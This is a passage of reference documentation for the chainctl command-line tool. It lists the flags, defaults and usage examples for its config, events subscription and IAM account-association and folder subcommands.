EDITOR to set the path to your preferred editor (default: nano). chainctl config edit [--config FILE] [--yes] [flags] Options -h, --help help for edit -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config reset URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_reset/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config reset Remove local chainctl config files and restore defaults. chainctl config reset [--yes] Options -h, --help help for reset -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config save URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_save/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config save Save the current chainctl config to a config file. chainctl config save [--config FILE] [--yes] [flags] Options -h, --help help for save -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config set URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_set/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config set Set an individual configuration value property. Synopsis Set an individual configuration value property. Property names are dot delimited and lowercase (for example, output.color.pass). chainctl config set PROPERTY_NAME PROPERTY_VALUE Examples # Set the api URL chainctl config set platform.api https://console-api.enforce.dev Options -h, --help help for set Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config unset URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_unset/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config unset Unset a configuration property and return it to default. Synopsis Unset a configuration property and return it to default. Property names are dot delimited and lowercase (for example, output.color.pass). chainctl config unset PROPERTY_NAME Examples # Return the pass color to its default chainctl config unset output.color.pass Options -h, --help help for unset Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config validate URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_validate/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config validate Run diagnostics on local config. chainctl config validate [--output=json|table] [flags] Options -h, --help help for validate Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config view URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_view/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config view View the current chainctl config. chainctl config view [--diff] [flags] Options --diff Show the difference between the local config file and the active configuration. -h, --help help for view Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl events URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events Events related commands for the Chainguard platform. Options -h, --help help for events Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl events subscriptions - Subscription interactions. --- ### chainctl events subscriptions URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions Subscription interactions. Options -h, --help help for subscriptions Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events - Events related commands for the Chainguard platform. chainctl events subscriptions create - Subscribe to events under an organization or folder. chainctl events subscriptions delete - Delete a subscription. chainctl events subscriptions list - List subscriptions. --- ### chainctl events subscriptions create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions create Subscribe to events under an organization or folder. chainctl events subscriptions create SINK_URL [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--yes] [--output=id|json|table] Options -h, --help help for create --parent string The parent location name or id of the subscription. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events subscriptions - Subscription interactions. --- ### chainctl events subscriptions delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions delete Delete a subscription. chainctl events subscriptions delete SUBSCRIPTION_ID [--yes] [--output=id] [flags] Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events subscriptions - Subscription interactions. --- ### chainctl events subscriptions list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions list List subscriptions. chainctl events subscriptions list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=id|json|table] Options -h, --help help for list --parent string The parent location name or id of the subscription. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events subscriptions - Subscription interactions. --- ### chainctl iam URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam IAM related commands for the Chainguard platform. Options -h, --help help for iam Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam folders - IAM folders interactions. chainctl iam identities - Identity management. chainctl iam identity-providers - customer managed identity provider management chainctl iam invites - Manage invite codes that register identities with Chainguard. chainctl iam organizations - IAM organization interactions. chainctl iam role-bindings - IAM role-bindings resource interactions. chainctl iam roles - IAM role resource interactions. --- ### chainctl iam account-associations URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations Configure and manage cloud provider account associations. Options -h, --help help for account-associations Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam account-associations check - Check the OIDC federation configurations for cloud providers. chainctl iam account-associations describe - Describe cloud provider account associations for a location. chainctl iam account-associations set - Set cloud provider account associations for a location. chainctl iam account-associations unset - Remove cloud provider account associations from a location. --- ### chainctl iam account-associations check URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_check/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations check Check the OIDC federation configurations for cloud providers. Options -h, --help help for check Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam account-associations check aws - Checks that the given location has been properly configured for OIDC federation with AWS chainctl iam account-associations check gcp - Checks that the given location has been properly configured for OIDC federation with GCP --- ### chainctl iam account-associations check aws URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_check_aws/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations check aws Checks that the given location has been properly configured for OIDC federation with AWS chainctl iam account-associations check aws ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [flags] Options -h, --help help for aws Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations check - Check the OIDC federation configurations for cloud providers. --- ### chainctl iam account-associations check gcp URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_check_gcp/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations check gcp Checks that the given location has been properly configured for OIDC federation with GCP chainctl iam account-associations check gcp ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [flags] Options -h, --help help for gcp Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations check - Check the OIDC federation configurations for cloud providers. --- ### chainctl iam account-associations describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations describe Describe cloud provider account associations for a location. chainctl iam account-associations describe ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [--aws] [--gcp] [--chainguard] [--output=id|json|table] [flags] Options --aws Include the AWS account association. --chainguard Include the Chainguard service principal account association. --gcp Include the GCP account association. -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. --- ### chainctl iam account-associations set URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_set/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations set Set cloud provider account associations for a location. Options -h, --help help for set Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam account-associations set aws - Set AWS account association for a location. chainctl iam account-associations set gcp - Set GCP account association for a location. --- ### chainctl iam account-associations set aws URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_set_aws/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations set aws Set AWS account association for a location. chainctl iam account-associations set aws ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID --account=ACCOUNT [--name=NAME] [--description=DESCRIPTION] [--yes] [--output=id|json|table] [flags] Options --account string The AWS account ID. -d, --description string The description of the resource. -h, --help help for aws -n, --name string Given name of the resource. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations set - Set cloud provider account associations for a location. --- ### chainctl iam account-associations set gcp URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_set_gcp/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations set gcp Set GCP account association for a location. chainctl iam account-associations set gcp ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID --project-id=PROJECT_ID --project-number=PROJECT_NUMBER [--name=NAME] [--description=DESCRIPTION] [--yes] [--output=id|json|table] [flags] Options -d, --description string The description of the resource. -h, --help help for gcp -n, --name string Given name of the resource. --project-id string The GCP project ID. --project-number string The GCP project number. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations set - Set cloud provider account associations for a location. --- ### chainctl iam account-associations unset URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_unset/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations unset Remove cloud provider account associations from a location. Options -h, --help help for unset Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam account-associations unset aws - Remove AWS account configuration for a location. chainctl iam account-associations unset gcp - Remove GCP account configuration for a location. --- ### chainctl iam account-associations unset aws URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_unset_aws/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations unset aws Remove AWS account configuration for a location. chainctl iam account-associations unset aws ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [--yes] [flags] Options -h, --help help for aws -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations unset - Remove cloud provider account associations from a location. --- ### chainctl iam account-associations unset gcp URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_unset_gcp/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations unset gcp Remove GCP account configuration for a location. chainctl iam account-associations unset gcp ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [--yes] [flags] Options -h, --help help for gcp -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations unset - Remove cloud provider account associations from a location. --- ### chainctl iam folders URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders IAM folders interactions. Options -h, --help help for folders Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam folders delete - Delete a folder. chainctl iam folders describe - Describe a folder. chainctl iam folders list - List folders under an organization. chainctl iam folders update - Update a folder. --- ### chainctl iam folders delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders delete Delete a folder. chainctl iam folders delete [FOLDER_NAME | FOLDER_ID] [--skip-refresh] [--yes] Examples # Delete a folder by ID chainctl iam folders delete 19d3a64f20c64ba3ccf1bc86ce59d03e705959ad/efb53f2857d567f2 # Delete a folder by name chainctl iam folders delete my-folder # Delete a folder to be selected interactively chainctl iam folders delete Options -h, --help help for delete --skip-refresh Skips attempting to reauthenticate and refresh the Chainguard auth token if it becomes out of date. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam folders describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders describe Describe a folder. chainctl iam folders describe [FOLDER_NAME | FOLDER_ID] [--active-within=DURATION] [--output=json] Options --active-within duration How recently a record must have been active to be listed. Zero will return all records. (default 24h0m0s) -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam folders list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders list List folders under an organization. chainctl iam folders list ORGANIZATION_NAME | ORGANIZATION_ID [--output=id|json|table|tree] Options -h, --help help for list Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam folders update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders update Update a folder. chainctl iam folders update FOLDER_NAME | FOLDER_ID [--name FOLDER_NAME] [--description FOLDER_DESCRIPTION] Examples # Update a folder's name chainctl iam folders update my-folder --name new-folder-name # Update a folder's description chainctl iam folders update 